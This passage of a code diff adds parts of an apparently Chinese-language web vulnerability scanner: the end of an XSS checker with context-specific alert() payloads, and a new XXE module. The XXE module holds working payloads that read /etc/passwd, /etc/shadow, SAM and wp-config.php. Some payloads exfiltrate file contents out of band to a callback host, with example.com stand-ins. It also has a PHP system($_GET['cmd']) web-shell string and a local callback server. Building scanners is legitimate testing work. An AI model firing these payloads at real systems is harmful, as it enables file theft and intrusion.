+            for tag_name in ['script', 'img', 'svg', 'iframe', 'body', 'input', 'textarea', 'video', 'audio', 
+                           'a', 'div', 'button', 'form', 'object', 'embed', 'style', 'link', 'meta', 'noscript']:
+                tags = soup.find_all(tag_name)
+                for tag in tags:
+                    tag_str = str(tag)
+                    if self.xss_mark in tag_str:
+                        return True
+                        
+            # 检查特定属性
+            dangerous_attrs = [
+                'src', 'href', 'action', 'data', 'formaction', 'content', 'poster', 'background',
+                'onerror', 'onload', 'onfocus', 'onblur', 'onclick', 'onmouseover', 'onmouseout',
+                'onkeyup', 'onkeydown', 'onchange', 'onsubmit', 'onreset', 'onselect', 'onabort',
+                'ondblclick', 'onkeypress', 'onmousedown', 'onmouseup', 'onmousemove', 'onunload',
+                'onbeforeunload', 'onhashchange', 'onpageshow', 'onpagehide', 'onplay', 'onpause',
+                'ontoggle', 'onanimationstart', 'onanimationend', 'onanimationiteration', 'ontransitionend',
+                'oncopy', 'oncut', 'onpaste', 'onwheel', 'onmessage', 'onstorage'
+            ]
+            
+            for tag in soup.find_all():
+                for attr in dangerous_attrs:
+                    if tag.has_attr(attr) and self.xss_mark in tag[attr]:
+                        return True
+            
+            # 检查内联样式表
+            for style_tag in soup.find_all('style'):
+                if self.xss_mark in style_tag.string:
+                    return True
+                    
+            # 检查JSON数据
+            script_tags = soup.find_all('script')
+            for script in script_tags:
+                if script.string and ('{' in script.string or '[' in script.string):
+                    if self.xss_mark in script.string:
+                        return True
+                        
+            # 检查URL中的javascript:协议
+            for tag in soup.find_all(href=True):
+                href = tag['href']
+                if href.startswith('javascript:') and self.xss_mark in href:
+                    return True
+                    
+            # 检查HTML注释
+            comments = soup.find_all(string=lambda text: isinstance(text, str) and text.strip().startswith('<!--'))
+            for comment in comments:
+                if self.xss_mark in comment:
+                    return True
+                    
+            # 检查隐藏的DOM元素
+            for tag in soup.find_all(style=True):
+                style = tag['style']
+                if (('display:none' in style or 'visibility:hidden' in style) and 
+                    self.xss_mark in str(tag)):
+                    return True
+                    
+            # 检查编码内容(base64等)
+            encoded_patterns = [
+                r'base64,[a-zA-Z0-9+/=]+', 
+                r'data:[^,]+,[a-zA-Z0-9+/=]+'
+            ]
+            
+            for pattern in encoded_patterns:
+                matches = re.findall(pattern, response.text)
+                for match in matches:
+                    try:
+                        decoded = base64.b64decode(match.split(',')[1]).decode('utf-8')
+                        if self.xss_mark in decoded:
+                            return True
+                    except:
+                        pass
+                        
+        except Exception as e:
+            logger.error(f"检查XSS时发生错误: {str(e)}")
+            
+        return False
+    
+    def _detect_context(self, response, injection_point):
+        """
+        检测XSS注入点的上下文
+        
+        Args:
+            response: 响应对象
+            injection_point: 注入点标记
+            
+        Returns:
+            str: 上下文类型 (html, attribute, js, css, url, json)
+        """
+        if not response or not response.text or injection_point not in response.text:
+            return "unknown"
+            
+        try:
+            html_content = response.text
+            soup = BeautifulSoup(html_content, 'html.parser')
+            
+            # 查找注入点在哪个地方
+            for tag in soup.find_all():
+                # 检查是否在标签内文本中
+                if tag.string and injection_point in tag.string:
+                    if tag.name == 'script':
+                        return "js"
+                    elif tag.name == 'style':
+                        return "css"
+                    else:
+                        return "html"
+                
+                # 检查是否在属性中
+                for attr, value in tag.attrs.items():
+                    if isinstance(value, str) and injection_point in value:
+                        if attr in ['src', 'href', 'action', 'formaction']:
+                            return "url"
+                        elif attr.startswith('on'):
+                            return "js_event"
+                        else:
+                            return "attribute"
+            
+            # 检查是否在script的JSON数据中
+            script_tags = soup.find_all('script')
+            for script in script_tags:
+                if script.string and injection_point in script.string:
+                    if '{' in script.string or '[' in script.string:
+                        try:
+                            # 尝试解析成JSON
+                            text = script.string
+                            json_start = text.find('{')
+                            json_end = text.rfind('}') + 1
+                            if json_start >= 0 and json_end > json_start:
+                                json_text = text[json_start:json_end]
+                                if injection_point in json_text:
+                                    return "json"
+                        except:
+                            pass
+                    return "js"
+            
+            # 如果没有找到，可能是在HTML注释或其他地方
+            if f"<!--{injection_point}-->" in html_content or f"<!--{injection_point}" in html_content or f"{injection_point}-->" in html_content:
+                return "comment"
+                
+            # 检查内联样式
+            for style_tag in soup.find_all('style'):
+                if style_tag.string and injection_point in style_tag.string:
+                    return "css"
+                    
+        except Exception as e:
+            logger.error(f"检测上下文时出错: {str(e)}")
+            
+        return "unknown"
+        
+    def _get_context_specific_payloads(self, context):
+        """
+        获取特定上下文的XSS有效载荷
+        
+        Args:
+            context: 上下文类型
+            
+        Returns:
+            list: 适合该上下文的XSS有效载荷列表
+        """
+        # 基本的XSS标记
+        xss_mark = self.xss_mark
+        
+        html_payloads = [
+            f"<img src=x onerror=alert('{xss_mark}')>",
+            f"<svg onload=alert('{xss_mark}')>",
+            f"<iframe onload=alert('{xss_mark}')></iframe>"
+        ]
+        
+        js_payloads = [
+            f"alert('{xss_mark}')",
+            f"(function(){{alert('{xss_mark}')}})();",
+            f"';alert('{xss_mark}');//",
+            f"\";alert('{xss_mark}');//",
+            f"\\';alert('{xss_mark}');//",
+            f"</script><img src=x onerror=alert('{xss_mark}')>"
+        ]
+        
+        attribute_payloads = [
+            f"\" onmouseover=\"alert('{xss_mark}')\" \"",
+            f"' onmouseover='alert(\"{xss_mark}\")' '",
+            f"onload=alert('{xss_mark}')",
+            f"\" onerror=\"alert('{xss_mark}')\" \"",
+            f"' onerror='alert(\"{xss_mark}\")' '"
+        ]
+        
+        url_payloads = [
+            f"javascript:alert('{xss_mark}')",
+            f"data:text/html,<img src=x onerror=alert('{xss_mark}')>",
+            f"data:text/html;base64,{base64.b64encode(f'<img src=x onerror=alert(\'{xss_mark}\')>'.encode()).decode()}"
+        ]
+        
+        css_payloads = [
+            f"</style><img src=x onerror=alert('{xss_mark}')>",
+            f"</style><script>alert('{xss_mark}')</script>",
+            f"<style>@import url(\"data:,*%7bx:expression(alert('{xss_mark}'))%7d\");</style>"
+        ]
+        
+        json_payloads = [
+            f"\",\"x\":\"<img src=x onerror=alert('{xss_mark}')>\",\"",
+            f"\"-alert('{xss_mark}')-\"",
+            f"\\u003cimg src=x onerror=alert('{xss_mark}')\\u003e"
+        ]
+        
+        js_event_payloads = [
+            f"alert('{xss_mark}')",
+            f"a=alert;a('{xss_mark}')",
+            f"[].map(alert)[0]('{xss_mark}')",
+            f"eval('ale'+'rt')(`{xss_mark}`)"
+        ]
+        
+        comment_payloads = [
+            f"--><img src=x onerror=alert('{xss_mark}')><!--",
+            f"--><script>alert('{xss_mark}')</script><!--"
+        ]
+        
+        # 根据上下文返回对应的有效载荷
+        context_payloads = {
+            "html": html_payloads,
+            "js": js_payloads,
+            "attribute": attribute_payloads,
+            "url": url_payloads,
+            "css": css_payloads,
+            "json": json_payloads,
+            "js_event": js_event_payloads,
+            "comment": comment_payloads,
+            "unknown": html_payloads + js_payloads + attribute_payloads
+        }
+        
+        return context_payloads.get(context, html_payloads)
+    
+    def _generate_random_string(self, length=8):
+        """
+        生成随机字符串
+        
+        Args:
+            length: 字符串长度
+            
+        Returns:
+            str: 随机字符串
+        """
+        chars = string.ascii_letters + string.digits
+        return ''.join(random.choice(chars) for _ in range(length))
+    
+    def _to_js_string(self, s):
+        """
+        将字符串转换为JavaScript字符串
+        
+        Args:
+            s: 字符串
+            
+        Returns:
+            str: JavaScript字符串
+        """
+        js_escape_table = {
+            '\\': '\\\\',
+            '\r': '\\r',
+            '\n': '\\n',
+            '"': '\\"',
+            "'": "\\'"
+        }
+        
+        result = ''
+        for c in s:
+            if c in js_escape_table:
+                result += js_escape_table[c]
+            else:
+                result += c
+                
+        return f"'{result}'"
+    
+    def close(self):
+        """关闭资源"""
+        if self.use_browser and self.driver:
+            try:
+                self.driver.quit()
+            except:
+                pass
+            
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True
+        
+    def get_tech_info(self):
+        """获取技术检测信息"""
+        return self.tech_info 
\ No newline at end of file
diff --git a/xss_scanner/scanners/xxe_scanner.py b/xss_scanner/scanners/xxe_scanner.py
new file mode 100644
index 0000000..8c9f048
--- /dev/null
+++ b/xss_scanner/scanners/xxe_scanner.py
@@ -0,0 +1,825 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XXE（XML外部实体注入）扫描器模块，负责扫描XXE漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import time
+import uuid
+import base64
+import urllib.parse
+import socket
+import threading
+import http.server
+import socketserver
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+
+logger = logging.getLogger('xss_scanner')
+
+class OOBXXEServer(threading.Thread):
+    """带外(OOB)XXE检测服务器类"""
+    
+    def __init__(self, host='localhost', port=0):
+        """
+        初始化OOB XXE检测服务器
+        
+        Args:
+            host: 服务器主机名
+            port: 服务器端口
+        """
+        super().__init__()
+        self.daemon = True
+        self.host = host
+        self.port = port
+        self.server = None
+        self.detected_xxe = []
+        self.uuid_to_details = {}
+        
+    def run(self):
+        """运行OOB XXE检测服务器"""
+        class XXEHandler(http.server.BaseHTTPRequestHandler):
+            def log_message(self, format, *args):
+                # 禁止日志输出
+                pass
+                
+            def do_GET(self):
+                # 响应状态码
+                self.send_response(200)
+                self.send_header('Content-type', 'application/xml')
+                self.end_headers()
+                
+                # 记录请求到detected_xxe
+                request_id = self.path.strip('/').split('/')[-1]
+                attack_details = self.server.uuid_to_details.get(request_id, {})
+                
+                if request_id and len(request_id) > 8:  # 有效的UUID
+                    self.server.detected_xxe.append({
+                        'id': request_id,
+                        'timestamp': time.time(),
+                        'remote_addr': self.client_address[0],
+                        'path': self.path,
+                        'headers': {k: v for k, v in self.headers.items()},
+                        'attack_details': attack_details
+                    })
+                    logger.info(f"检测到XXE回调: {request_id} 来自 {self.client_address[0]}")
+                
+                # 响应内容
+                self.wfile.write(b"<?xml version='1.0'?><!DOCTYPE data SYSTEM 'http://invalid/invalid.dtd'><data></data>")
+                
+        class XXEServer(socketserver.ThreadingTCPServer):
+            allow_reuse_address = True
+            def __init__(self, server_address, handler_class):
+                super().__init__(server_address, handler_class)
+                self.detected_xxe = []
+                self.uuid_to_details = {}
+                
+        try:
+            self.server = XXEServer((self.host, self.port), XXEHandler)
+            self.server.detected_xxe = self.detected_xxe
+            self.server.uuid_to_details = self.uuid_to_details
+            actual_port = self.server.server_address[1]
+            if self.port == 0:
+                self.port = actual_port
+            logger.info(f"OOB XXE检测服务器启动在 {self.host}:{self.port}")
+            self.server.serve_forever()
+        except Exception as e:
+            logger.error(f"启动OOB XXE检测服务器失败: {str(e)}")
+        
+    def stop(self):
+        """停止OOB XXE检测服务器"""
+        if self.server:
+            self.server.shutdown()
+            
+    def register_attack(self, uuid_str, details):
+        """
+        注册攻击到OOB服务器
+        
+        Args:
+            uuid_str: 攻击的UUID
+            details: 攻击详情
+        """
+        self.uuid_to_details[uuid_str] = details
+        
+    def check_detection(self, uuid_str):
+        """
+        检查是否检测到指定UUID的XXE攻击
+        
+        Args:
+            uuid_str: 要检查的UUID
+            
+        Returns:
+            bool: 是否检测到XXE攻击
+        """
+        for detection in self.detected_xxe:
+            if detection['id'] == uuid_str:
+                return True
+        return False
+
+class XXEScanner:
+    """XXE扫描器类，负责扫描XML外部实体注入漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化XXE扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 生成唯一标识符，用于检测XXE漏洞
+        self.xxe_id = str(uuid.uuid4()).replace('-', '')[:16]
+        
+        # XXE回调域名（尝试使用本地服务器）
+        try:
+            # 尝试启动本地OOB服务器
+            self.oob_server = OOBXXEServer(host='0.0.0.0', port=0)
+            self.oob_server.start()
+            time.sleep(1)  # 等待服务器启动
+            
+            # 获取本机IP
+            hostname = socket.gethostname()
+            ip = socket.gethostbyname(hostname)
+            
+            self.callback_domain = f"http://{ip}:{self.oob_server.port}/{self.xxe_id}"
+            self.dtd_server = f"http://{ip}:{self.oob_server.port}/{self.xxe_id}.dtd"
+            self.oob_available = True
+            logger.info(f"OOB XXE检测服务器启动成功: {self.callback_domain}")
+        except Exception as e:
+            logger.warning(f"启动OOB XXE检测服务器失败: {str(e)}, 将使用示例域名")
+            # 使用示例域名
+            self.callback_domain = f"http://xxe-check.example.com/{self.xxe_id}"
+            self.dtd_server = f"http://dtd-server.example.com/{self.xxe_id}.dtd"
+            self.oob_available = False
+        
+        # XXE Payload数据文件/目录
+        self.common_data_files = [
+            # Linux系统文件
+            "/etc/passwd",
+            "/etc/hosts",
+            "/etc/shadow",
+            "/etc/group",
+            "/etc/issue",
+            "/etc/motd",
+            "/proc/self/environ",
+            "/proc/version",
+            "/proc/cmdline",
+            
+            # Windows系统文件
+            "C:/Windows/win.ini",
+            "C:/boot.ini",
+            "C:/Windows/System32/drivers/etc/hosts",
+            "C:/Windows/System32/config/SAM",
+            
+            # Web应用配置文件
+            "/var/www/html/config.php",
+            "/var/www/html/wp-config.php",
+            "/var/www/html/configuration.php",
+            "/var/www/config/config.ini",
+            "/usr/local/etc/apache22/httpd.conf",
+            "/usr/local/etc/apache24/httpd.conf",
+            "/etc/nginx/nginx.conf",
+            "/etc/httpd/conf/httpd.conf",
+            
+            # 源代码目录
+            "file:///var/www/html/",
+            "file:///var/www/",
+            "file:///var/",
+            "file:///home/",
+            "file:///usr/local/tomcat/conf/server.xml"
+        ]
+        
+        # XXE检测Payload列表 - 基础
+        self.basic_payloads = [
+            # 基本外部实体声明
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+            <foo>&xxe;</foo>""",
+            
+            # 参数实体
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY % xxe SYSTEM "file:///etc/passwd" >
+            %xxe;
+            ]>
+            <foo></foo>""",
+            
+            # 带外数据泄露 (OOB)
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY % xxe SYSTEM "{self.dtd_server}" >
+            %xxe;
+            ]>
+            <foo></foo>""",
+            
+            # 带外请求 (OOB)
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY % xxe SYSTEM "{self.callback_domain}" >
+            %xxe;
+            ]>
+            <foo></foo>""",
+            
+            # PHP环境探测
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" >]>
+            <foo>&xxe;</foo>""",
+            
+            # 基本DTD实体定义
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE data [
+            <!ENTITY file SYSTEM "file:///etc/passwd">
+            ]>
+            <data>&file;</data>"""
+        ]
+        
+        # XXE检测Payload列表 - 高级
+        self.advanced_payloads = [
+            # 带外XXE - 数据泄露 (OOB exfiltration)
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE data [
+            <!ENTITY % file SYSTEM "file:///etc/passwd">
+            <!ENTITY % dtd SYSTEM "{self.dtd_server}">
+            %dtd;
+            ]>
+            <data>&send;</data>""",
+            
+            # Blind XXE with error-based exfiltration
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE data [
+            <!ENTITY % file SYSTEM "file:///etc/passwd">
+            <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+            %eval;
+            %error;
+            ]>
+            <data>Test</data>""",
+            
+            # XXE via SOAP
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
+            <!DOCTYPE foo [
+            <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+            <soap:Body><foo>&xxe;</foo></soap:Body>
+            </soap:Envelope>""",
+            
+            # XXE via SVG
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE svg [ 
+            <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+            <svg width="100" height="100">
+                <text x="10" y="20">&xxe;</text>
+            </svg>""",
+            
+            # XXE通过XSLT
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <?xml-stylesheet type="text/xsl" href="#stylesheet"?>
+            <!DOCTYPE doc [
+            <!ENTITY % dtd SYSTEM "file:///etc/passwd">
+            %dtd;
+            ]>
+            <doc>
+            <stylesheet id="stylesheet">
+            <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+            <xsl:template match="/">
+            <p>Passwd content: &xxe;</p>
+            </xsl:template>
+            </xsl:stylesheet>
+            </doc>""",
+            
+            # 扩展实体XXE 
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY xxe SYSTEM "expect://id" >]>
+            <foo>&xxe;</foo>""",
+            
+            # XXE to RCE (PHP)
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ELEMENT foo ANY >
+            <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=data://text/plain,<?php system($_GET['cmd']); ?>" >]>
+            <foo>&xxe;</foo>""",
+            
+            # XML Parameter Entities
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE root [
+            <!ENTITY % remote SYSTEM "{self.callback_domain}">
+            %remote;
+            ]>
+            <root/>""",
+            
+            # XXE基于错误的数据提取
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ENTITY % xxe SYSTEM "file:///etc/passwd" >
+            <!ENTITY % load "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%xxe;'>">
+            %load;
+            %error;
+            ]>
+            <foo></foo>""",
+            
+            # 压缩实体引用(ZIP)
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE foo [
+            <!ENTITY xxe SYSTEM "jar:file:///tmp/evil.jar!/file.txt" >]>
+            <foo>&xxe;</foo>""",
+            
+            # 带有编码过滤器的PHP数据读取 
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE root [
+            <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>
+            <root>&xxe;</root>""",
+            
+            # XXE通过Office文档格式(XML)
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE office:document-content [
+            <!ENTITY % remote SYSTEM "{self.callback_domain}">
+            %remote;
+            ]>
+            <office:document-content></office:document-content>"""
+        ]
+        
+        # 合并所有Payload
+        self.payloads = self.basic_payloads + self.advanced_payloads
+        
+        # DTD定义，用于OOB数据渗出
+        self.dtd_content = f"""<!ENTITY % file SYSTEM "file:///etc/passwd">
+        <!ENTITY % combined "<!ENTITY send SYSTEM '{self.callback_domain}?data=%file;'>">
+        %combined;"""
+        
+        # 为OAST检测方法准备的唯一标识符
+        self.oast_identifiers = {}
+        
+    def generate_xxe_payload(self, target_file):
+        """
+        生成针对指定文件的XXE有效载荷
+        
+        Args:
+            target_file: 目标文件路径
+            
+        Returns:
+            str: XXE有效载荷
+        """
+        uuid_str = str(uuid.uuid4()).replace('-', '')[:8]
+        
+        # 有效载荷模板
+        templates = [
+            # 标准文件读取
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE root [
+            <!ENTITY % file SYSTEM "file://{target_file}">
+            <!ENTITY % dtd SYSTEM "{self.dtd_server}">
+            %dtd;
+            ]>
+            <root>&send;</root>""",
+            
+            # 错误泄露
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE root [
+            <!ENTITY % file SYSTEM "file://{target_file}">
+            <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
+            %eval;
+            %error;
+            ]>
+            <root>XXE Test</root>""",
+            
+            # PHP过滤器
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE root [
+            <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={target_file}">
+            ]>
+            <root>&xxe;</root>""",
+            
+            # 直接引用实体
+            f"""<?xml version="1.0" encoding="UTF-8"?>
+            <!DOCTYPE root [
+            <!ENTITY xxe SYSTEM "file://{target_file}">
+            ]>
+            <root>&xxe;</root>"""
+        ]
+        
+        # 随机选择一个模板
+        return random.choice(templates)
+        
+    def register_oast_attack(self, param_name, url, payload_type="XXE"):
+        """
+        注册一个OAST攻击用于追踪
+        
+        Args:
+            param_name: 参数名
+            url: 目标URL
+            payload_type: 有效载荷类型
+            
+        Returns:
+            str: 唯一标识符
+        """
+        uuid_str = str(uuid.uuid4()).replace('-', '')[:12]
+        self.oast_identifiers[uuid_str] = {
+            'param': param_name,
+            'url': url,
+            'timestamp': time.time(),
+            'type': payload_type
+        }
+        
+        # 如果OOB服务器可用，注册攻击
+        if hasattr(self, 'oob_server') and self.oob_available:
+            self.oob_server.register_attack(uuid_str, self.oast_identifiers[uuid_str])
+            
+        return uuid_str
+        
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的XXE漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        logger.debug(f"扫描表单字段: {field.get('name')} @ {url} 的XXE漏洞")
+        
+        # 检查字段类型，只处理可能包含XML内容的字段
+        field_type = field.get('type', '').lower()
+        field_name = field.get('name', '').lower()
+        
+        # 如果不是可能包含XML的字段，则跳过
+        if not (field_type in ['text', 'textarea', 'file'] or 
+                any(xml_hint in field_name for xml_hint in ['xml', 'soap', 'wsdl', 'config', 'data'])):
+            return None
+            
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 依次测试每个XXE Payload
+        for payload in self.payloads:
+            # 注册OAST攻击
+            oast_id = self.register_oast_attack(field['name'], url)
+            
+            # 替换Payload中的UUID
+            payload = payload.replace(self.xxe_id, oast_id)
+            
+            # 构建表单数据
+            form_data = {}
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 提交表单
+            try:
+                logger.debug(f"测试XXE Payload: {payload[:100]}...")
+                headers = {'Content-Type': 'application/xml'}
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data, headers=headers)
+                else:
+                    response = self.http_client.get(action_url, params=form_data, headers=headers)
+                    
+                # 检查响应内容中是否包含敏感信息
+                if response and self._check_xxe_success(response.text):
+                    return {
+                        'type': 'XXE',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'evidence': self._extract_evidence(response.text),
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现XXE漏洞",
+                        'details': {
+                            "表单操作": action_url,
+                            "表单方法": method,
+                            "漏洞字段": field['name'],
+                            "有效载荷": payload
+                        },
+                        'recommendation': "禁用XML外部实体解析，使用安全的XML解析库，验证并过滤用户输入"
+                    }
+                
+                # 检查OOB XXE检测结果
+                if hasattr(self, 'oob_server') and self.oob_available:
+                    time.sleep(2)  # 等待可能的回调
+                    if self.oob_server.check_detection(oast_id):
+                        return {
+                            'type': 'XXE',
+                            'subtype': 'Out-of-Band XXE',
+                            'url': url,
+                            'form_action': action_url,
+                            'form_method': method,
+                            'parameter': field['name'],
+                            'payload': payload,
+                            'severity': '高',
+                            'description': f"在表单字段'{field['name']}'中发现带外(OOB)XXE漏洞",
+                            'details': {
+                                "表单操作": action_url,
+                                "表单方法": method,
+                                "漏洞字段": field['name'],
+                                "有效载荷": payload,
+                                "检测方法": "带外(OOB)XXE检测"
+                            },
+                            'recommendation': "禁用XML外部实体解析，使用安全的XML解析库，验证并过滤用户输入"
+                        }
+            except Exception as e:
+                logger.error(f"测试XXE Payload时发生错误: {str(e)}")
+                
+        # 目标文件特定测试
+        for target_file in self.common_data_files[:5]:  # 限制测试数量
+            payload = self.generate_xxe_payload(target_file)
+            
+            # 构建表单数据
+            form_data = {}
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        form_data[f['name']] = f.get('value', '')
+                        
+            # 提交表单
+            try:
+                logger.debug(f"测试针对 {target_file} 的XXE Payload")
+                headers = {'Content-Type': 'application/xml'}
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data, headers=headers)
+                else:
+                    response = self.http_client.get(action_url, params=form_data, headers=headers)
+                    
+                # 检查响应内容中是否包含敏感信息
+                if response and self._check_xxe_success(response.text):
+                    return {
+                        'type': 'XXE',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'target_file': target_file,
+                        'evidence': self._extract_evidence(response.text),
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现XXE漏洞，可读取文件 {target_file}",
+                        'details': {
+                            "表单操作": action_url,
+                            "表单方法": method,
+                            "漏洞字段": field['name'],
+                            "有效载荷": payload,
+                            "目标文件": target_file
+                        },
+                        'recommendation': "禁用XML外部实体解析，使用安全的XML解析库，验证并过滤用户输入"
+                    }
+            except Exception as e:
+                logger.error(f"测试特定文件XXE Payload时发生错误: {str(e)}")
+            
+        return None
+        
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的XXE漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        logger.debug(f"扫描URL参数: {param} @ {url} 的XXE漏洞")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则跳过
+        if param not in query_params:
+            return None
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 如果参数名称中不包含可能的XML相关提示，则跳过
+        param_lower = param.lower()
+        if not any(xml_hint in param_lower for xml_hint in ['xml', 'soap', 'wsdl', 'config', 'data']):
+            return None
+            
+        # 依次测试每个XXE Payload
+        for payload in self.payloads:
+            # 注册OAST攻击
+            oast_id = self.register_oast_attack(param, url)
+            
+            # 替换Payload中的UUID
+            payload = payload.replace(self.xxe_id, oast_id)
+            
+            # 构建新的查询参数
+            new_params = query_params.copy()
+            new_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(new_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            try:
+                logger.debug(f"测试XXE Payload: {payload[:100]}...")
+                headers = {'Content-Type': 'application/xml'}
+                
+                # 发送请求
+                response = self.http_client.get(test_url, headers=headers)
+                    
+                # 检查响应内容中是否包含敏感信息
+                if response and self._check_xxe_success(response.text):
+                    return {
+                        'type': 'XXE',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'evidence': self._extract_evidence(response.text),
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现XXE漏洞",
+                        'details': {
+                            "URL": url,
+                            "漏洞参数": param,
+                            "有效载荷": payload
+                        },
+                        'recommendation': "禁用XML外部实体解析，使用安全的XML解析库，验证并过滤用户输入"
+                    }
+                
+                # 检查OOB XXE检测结果
+                if hasattr(self, 'oob_server') and self.oob_available:
+                    time.sleep(2)  # 等待可能的回调
+                    if self.oob_server.check_detection(oast_id):
+                        return {
+                            'type': 'XXE',
+                            'subtype': 'Out-of-Band XXE',
+                            'url': url,
+                            'parameter': param,
+                            'payload': payload,
+                            'severity': '高',
+                            'description': f"在URL参数'{param}'中发现带外(OOB)XXE漏洞",
+                            'details': {
+                                "URL": url,
+                                "漏洞参数": param,
+                                "有效载荷": payload,
+                                "检测方法": "带外(OOB)XXE检测"
+                            },
+                            'recommendation': "禁用XML外部实体解析，使用安全的XML解析库，验证并过滤用户输入"
+                        }
+            except Exception as e:
+                logger.error(f"测试XXE Payload时发生错误: {str(e)}")
+            
+        return None
+        
+    def _check_xxe_success(self, content):
+        """
+        检查响应内容中是否包含XXE漏洞证据
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否存在XXE漏洞
+        """
+        if not content:
+            return False
+            
+        # 检查是否包含常见敏感文件的特征
+        indicators = [
+            # /etc/passwd文件特征
+            r"root:.*:0:0:",
+            r"nobody:.*:65534:",
+            r"daemon:.*:1:1:",
+            
+            # Windows系统文件特征
+            r"\[fonts\]",
+            r"\[extensions\]",
+            r"for 16-bit app support",
+            
+            # 各种配置文件特征
+            r"<VirtualHost",
+            r"<Directory",
+            r"DocumentRoot",
+            r"Listen 80",
+            r"<IfModule",
+            r"worker_processes",
+            r"http {",
+            r"server {",
+            
+            # PHP配置文件特征
+            r"DB_PASSWORD",
+            r"DB_HOST",
+            r"define\s*\(\s*['\"](DB_|SECURE_AUTH_)",
+            
+            # 基础Base64编码的特征
+            r"^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)?$"
+        ]
+        
+        for indicator in indicators:
+            if re.search(indicator, content):
+                return True
+                
+        # 检查是否包含可能的Base64编码内容
+        base64_pattern = r"([A-Za-z0-9+/]{40,}={0,2})"
+        matches = re.findall(base64_pattern, content)
+        for match in matches:
+            try:
+                decoded = base64.b64decode(match).decode('utf-8', errors='ignore')
